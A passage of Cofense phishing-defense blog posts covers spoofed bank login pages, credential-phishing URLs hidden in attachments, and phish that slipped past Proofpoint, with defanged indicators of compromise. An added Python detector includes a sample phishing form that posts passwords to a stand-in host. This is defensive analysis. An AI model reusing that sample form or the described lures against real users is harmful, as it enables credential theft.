Figures 10 through 20 show the login pages for the remaining eleven spoofed banks.  

Figure 10 – ATB 

Figure 11 – BMO 

Figure 12 – CIBC  

Figure 13 – Desjardins  

Figure 14 – Laurentian  

Figure 15 – Meridian  

Figure 16 – National Bank 

Figure 17 – RBC  

Figure 18 – Simplii  

Figure 19 – Tangerine  

Figure 20 – TD  

Indicators of Compromise

Malicious URL:

hxxps://lincolnrestaurant-dc[.]com/interca

Associated IP:

108[.]167[.]182[.]39

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Trend: Credphish Links Stuffed in Benign Attachments Are on the Rise

By Kian Mahdavi, Cofense Phishing Defense Center

While it’s true that most enterprise-directed phishing is credential phishing, that doesn’t mean attackers have completely abandoned attachments. The days of malware-laden attachments are dwindling. You’re not going to find dangerous embedded macros or .VBS files in 2020 at the same frequency observed in 2016. Attackers are using attachments, more now than ever, to deliver embedded URLs. Why? Because secure email gateway (SEG) vendors have emphasized auto-scanning and wrapping URLs in the body of emails.

During the last few weeks, the Cofense Phishing Defense Center (PDC) has observed a significant uptick in credphish URLs stuffed in attachments successfully bypassing several commercial SEGs. The attachment types are varied, but many are commonly used in normal business communications – .DOC .HTML, .HTM, .XLSX, .PDF, etc. Check out our REAL phishing threats samples here for a complete list.

If you think stuffing credphish URLs in attachments to sidestep automated URL scanning is a no-brainer for attackers, we agree. You’d be surprised at the number of SOAR vendors demoing automated-phishing-analysis playbooks that fail due to this simple attacker adaptation. This phenomenon isn’t going to slow down.

Here’s a common example of a campaign reported to the PDC by a vigilant user:

Figure 1: Email Body

There has been a recent rash – 500 variants – of this campaign reported by our users via the Cofense Reporter Button. The campaign originated from an assumed compromised account at a legitimate business, which surely added to the sense of legitimacy. Luckily, the recipient asked themselves: “Am I expecting to receive a document from this sender?”

Upon opening the attached .XLSX document, Microsoft Excel loads, prompting the user to click an embedded image using “trusted” brands to spruce up the legitimacy of the ruse. Once clicked, the attack redirects to the phishing landing page requesting the user’s credentials.

Figure 2 – The underlying “Open” link doesn’t take the victim to OneDrive

Once credentials have been supplied, the phishing website redirects the user to the authentic “office[.]com” to make the victim feel like the whole experience was legit.

Figure 3 – Phishing landing page 

Figure 4 – Redirect to authentic office[.]com webpage 

Figure 5 below shows the HTML source of the landing page, including the POST request issued when a user types in their credentials and attempts to log in. The submitted data is forwarded to the attacker via a pre-configured PHP script.    

Figure 5 – POST command forwards users’ credentials to the above URL 
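Because the post's own landing-page HTML is not reproduced here, the following is an added example with a constructed sample, not the campaign's code. It applies the check a defender would run on the .HTML and .HTM attachments this post describes, and on a fetched landing page: find any form that collects a password and submits it to an absolute URL on another host (a PHP endpoint in this campaign), and list the outbound links the page carries. The brand CDN, `harvester.example.net` host and form field names are assumptions.

```python
"""Inspect an HTML attachment or landing page for credential-exfiltrating forms.

Added example; not part of the Cofense post. Uses only the standard library.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the post's description: a trusted-brand image,
# a password form whose action is a PHP script on an unrelated host, and a
# link back to the genuine office.com used to make the experience look legit.
SAMPLE_ATTACHMENT = """<html><body>
<img src="https://cdn.example-brand.test/onedrive-logo.png" alt="OneDrive">
<form method="POST" action="https://harvester.example.net/a1/shareaumine/login.php">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Open">
</form>
<a href="https://www.office.com/">Having trouble? Sign in here</a>
</body></html>"""


class AttachmentInspector(HTMLParser):
    """Collect forms (with their action, method and password-field flag) and links."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.links = []
        self._current = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "GET").upper(),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def inspect_attachment(html_text: str) -> dict:
    """Return credential forms posting off-host plus all outbound links."""
    parser = AttachmentInspector()
    parser.feed(html_text)
    parser.close()
    credential_forms = []
    for form in parser.forms:
        target = urlparse(form["action"])
        # A relative action (no host) cannot exfiltrate to a third party by itself;
        # only absolute actions with a password field are reported.
        if form["has_password"] and target.netloc:
            credential_forms.append({
                "action_host": target.netloc.lower(),
                "path": target.path,
                "method": form["method"],
                "php_endpoint": target.path.lower().endswith(".php"),
            })
    external_links = [h for h in parser.links if urlparse(h).netloc]
    return {"credential_forms": credential_forms, "links": external_links}


if __name__ == "__main__":
    report = inspect_attachment(SAMPLE_ATTACHMENT)
    for f in report["credential_forms"]:
        print("password form posts to", f["action_host"] + f["path"], "via", f["method"])
    print("outbound links:", report["links"])
```

A form with a password field whose action points at an external host is a strong signal on its own; the redirect to the real office[.]com described above shows why the links list matters too, since a benign-looking destination does not clear the page.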

Slipping credential phish URLs into innocuous attachments is going to frustrate SEGs for years to come because of the endless file formats that support HTML, compounded by all the clever ways attackers can obfuscate those URLs from automated analysis. Cofense customers avoided a disaster because of their commitment to upgrading their wetware.

Indicators of Compromise: 

Network IOC                                                    IP 
hxxps://noshgosh[.]com/9833636833/mau[.]html                   192[.]185[.]181[.]28 
hxxps://runyourrideonwater[.]com/a1/shareaumine/login[.]php    192[.]185[.]148[.]151 

File name:  Copy of mstglobal.xlsx  
MD5:  519615b29249d944f7564eb4f2d1feac 
SHA256:  ff9f56c61230a45ab662e7e2b650ec834ba4194cbcbc7cfcbdd06c0b046b64f6 
File Size:   36.2 KB 

Want to know the breakdown of phishing attacks by type? Make sure you look out for our annual report.



Phish Found in Proofpoint-Protected Environments – Week Ending September 27, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week we see a plethora of links – most of them using trusted services – reach customer inboxes. When technology is unable to block phish because of the risk of blocking legitimate emails, it’s well-trained users that detect and report threats.

sample phish spoofs the irs to deliver a link to buer loader

TYPE: Malware – Buer Loader

DESCRIPTION: This phish uses the element of surprise and urgency with a tax theme to lure the recipient into clicking the link. The link looks trustworthy, since it’s hosted in Google Docs. It leads, however, to an install of the Buer Loader. Cofense has been writing about the use of Google Docs in phishing attacks since 2017.

sample phish uses a payment theme to deliver a link to credential theft

TYPE: Credential Theft

DESCRIPTION: Leveraging a finance theme, this phish uses trustworthy Microsoft OneDrive URLs. Okay, so they’re not quite trustworthy, since they’ll lead the recipient to a Microsoft OneNote document that redirects to a credential harvesting site. Where did you want to go today?

sample phish uses a shipment theme to deliver a link to netwire rat

TYPE: Malware – NetWire RAT

DESCRIPTION: Spoofing a logistics company, this phish promises shipping information but hides malicious links behind innocent-looking images. Clicking the link leads the recipient to install GuLoader, which installs the NetWire Remote Access Trojan.

sample phish delivers a google doc link to buer loader that installs bazarbackdoor

TYPE: Malware – Buer Loader

DESCRIPTION: If you’re thinking this phish looks awfully familiar, it’s not you. Aside from the change to an employee termination theme, this attack leverages the exact same tactic as our first example – a Google Docs-hosted threat. In this case, the Buer Loader goes on to install the BazarBackdoor malware. These attacks should get you all fired up.

sample phish delivers xlsx attachment leading to agent tesla keylogger

TYPE: Malware – Agent Tesla

DESCRIPTION: Using a purchase theme, this phish offers to place an order for seafood but delivers a malicious Microsoft Excel spreadsheet with a CVE-2017-0199 to CVE-2017-11882 download chain to the Agent Tesla Keylogger. I wonder if they wanted that seafood shipped COD?

sample phish delivers credential phishing link using a document theme

TYPE: Credential Theft

DESCRIPTION: Spoofing a healthcare organization, this document-themed phish delivers a link to a credential harvesting site. Although redacted to protect the innocent, this sample used a very legitimate-looking message with signature block and legal disclaimer.

sample phish spoofs salesforce to deliver credential phishing link

TYPE: Credential Theft

DESCRIPTION: This phish uses urgency and the trappings of a popular SaaS platform to lure the recipient into clicking the link. In this case, the links lead to a credential harvesting site. Although not a panacea, Multi-Factor Authentication (MFA) is still an effective way to protect your organization.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify suspicious emails and empower them to report them. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.
